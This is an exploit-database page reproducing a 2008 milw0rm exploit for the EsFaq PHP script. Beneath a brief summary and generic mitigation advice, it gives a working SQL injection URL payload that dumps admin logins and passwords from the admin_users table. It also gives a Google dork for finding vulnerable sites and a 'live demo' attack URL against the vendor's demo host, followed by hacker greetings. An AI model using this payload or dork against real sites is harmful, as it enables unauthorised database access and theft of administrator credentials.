header-logo
Suggest Exploit
vendor:
EsFaq
by:
SuB-ZeRo
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EsFaq
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

EsFaq Remote Sql Injection Exploit

An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| EsFaq Remote Sql Injection Exploit
|
|___________________________________________________
|---------------------SuB-ZeRo----------------------|
|
|    Author: SuB-ZeRo
|
|    Home : www.dz-security.com
|
|    email:  FbH@hotmail.com
|
|
|___________________________________________________
|                                                   |
|
| script :http://editeurscripts.com/ressources/scripts-php/dl.php?idscript=5
|
| DorK   : inurl:questions.php?idcat
|___________________________________________________|
Exploit:
________
 
www.[target].com/Script/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--
 
 

L!VE DEMO:
_________
http://demo.editeurscripts.com/EsFaq/questions.php?idcat=10 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8,9 FROM admin_users--

____________
 
____________________________( Greetz )_________________________________
|
|    All members of the Forum  www.dz-security.com and www.no-exploit.com
|
| My friends : HiSoK4| x.CJP.x | bibi-infi | ThE BuTcHeR | charaf
| 
|  and all algeria hackers and all mouslimme
|__________________________ramadan karim all mouslimme____________________________________________

# milw0rm.com [2008-09-05]

Navigation

Suggest Exploit

Services By CQR